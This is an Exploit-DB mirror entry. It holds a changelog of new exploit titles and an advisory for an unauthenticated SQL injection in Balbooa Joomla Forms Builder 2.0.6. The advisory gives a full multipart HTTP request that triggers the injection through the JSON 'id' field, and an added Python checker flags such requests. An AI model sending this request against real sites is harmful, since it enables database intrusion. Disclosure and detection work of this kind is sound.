exploit-db-mirror/exploits/php/webapps/50447.txt
Offensive Security 358c35770a DB: 2021-10-26
17 changes to exploits/shellcodes

Netgear Genie 2.4.64 - Unquoted Service Path
OpenClinic GA 5.194.18 - Local Privilege Escalation
Gestionale Open 11.00.00 - Local Privilege Escalation

Hikvision Web Server Build 210702 - Command Injection
WordPress Plugin TaxoPress 3.0.7.1 - Stored Cross-Site Scripting (XSS) (Authenticated)
Engineers Online Portal 1.0 - File Upload Remote Code Execution (RCE)
Build Smart ERP 21.0817 - 'eidValue' SQL Injection (Unauthenticated)
Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2)
Balbooa Joomla Forms Builder 2.0.6 - SQL Injection (Unauthenticated)
Online Event Booking and Reservation System 1.0 - 'reason' Stored Cross-Site Scripting (XSS)
Engineers Online Portal 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)
Engineers Online Portal 1.0 - 'multiple' Authentication Bypass
Engineers Online Portal 1.0 - 'id' SQL Injection
WordPress Plugin Media-Tags 3.2.0.2 - Stored Cross-Site Scripting (XSS)
WordPress Plugin Ninja Tables 4.1.7 - Stored Cross-Site Scripting (XSS)
Wordpress 4.9.6 - Arbitrary File Deletion (Authenticated) (2)
phpMyAdmin 4.8.1 - Remote Code Execution (RCE)
2021-10-26 05:02:12 +00:00

# Exploit Title: Balbooa Joomla Forms Builder 2.0.6 - SQL Injection (Unauthenticated)
# Date: 24.10.2021
# Exploit Author: blockomat2100
# Vendor Homepage: https://www.balbooa.com/
# Version: 2.0.6
# Tested on: Docker

An example request to trigger the SQL-Injection:

POST /index.php?option=com_baforms HTTP/1.1
Host: localhost
Content-Length: 862
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTAak6w3vHUykgInT
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: 7b1c9321dbfaa3e34d2c66e9b23b9d21=016d065924684a506c09304ba2a13035
Connection: close

------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="1"

{"1":{"submission_id":0,"form_id":1,"field_id":1,"name":"test.png","filename":"test.png","date":"2021-09-28-17-19-51","id":"SQLI"}}
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="form-id"

1
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="task"

form.message
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="submit-btn"

2
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="page-title"

Home
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="page-url"

http://localhost/
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="page-id"

0
------WebKitFormBoundaryTAak6w3vHUykgInT--
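
A defender-side check for the request shape above, added here as an example and not part of the original advisory or the vendor's code: it parses a multipart/form-data body, decodes any JSON form fields, and reports ID keys whose value is not a plain integer. The function names are hypothetical, the sample bodies are constructed, and treating submission_id, form_id, field_id and id as integer-only is an assumption based on the numeric values in the request.

```python
import json
from email import message_from_bytes
from email.policy import HTTP

# Assumption: these keys hold integer row IDs, as the numeric siblings on the page suggest.
ID_KEYS = ("submission_id", "form_id", "field_id", "id")
BOUNDARY = "----WebKitFormBoundaryTAak6w3vHUykgInT"
CTYPE = "multipart/form-data; boundary=" + BOUNDARY

def form_fields(content_type: str, body: bytes) -> dict:
    """Parse a multipart/form-data body into {field name: text value}."""
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    fields = {}
    for part in message_from_bytes(raw, policy=HTTP).iter_parts():
        name = part.get_param("name", header="content-disposition")
        fields[name] = part.get_payload(decode=True).decode("utf-8", "replace").strip()
    return fields

def is_plain_id(value) -> bool:
    """True for a non-negative int or an ASCII digit string, nothing else."""
    if type(value) is int:
        return value >= 0
    return isinstance(value, str) and value.isascii() and value.isdigit()

def suspicious_ids(fields: dict) -> list:
    """List 'part.key=value' for every ID key whose value is not a plain ID."""
    findings = []
    for name, text in fields.items():
        try:
            doc = json.loads(text)
        except ValueError:
            continue  # not JSON (e.g. task, page-title)
        for entry in (doc.values() if isinstance(doc, dict) else ()):
            if isinstance(entry, dict):
                findings += [f"{name}.{k}={entry[k]!r}" for k in ID_KEYS
                             if k in entry and not is_plain_id(entry[k])]
    return findings

def sample_body(id_value) -> bytes:
    """Constructed sample with the same part layout as the request on this page."""
    upload = {"1": {"submission_id": 0, "form_id": 1, "field_id": 1,
                    "name": "test.png", "filename": "test.png", "id": id_value}}
    parts = {"1": json.dumps(upload), "form-id": "1", "task": "form.message"}
    out = "".join(f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{n}"\r\n\r\n{v}\r\n'
                  for n, v in parts.items())
    return (out + f"--{BOUNDARY}--\r\n").encode()

if __name__ == "__main__":
    print([suspicious_ids(form_fields(CTYPE, sample_body(v))) for v in (7, "SQLI")])
```

The same allow-list rule (reject anything that is not an integer before it reaches a query) applies server-side; a log or proxy filter like this only flags requests and does not replace parameterized queries in the component.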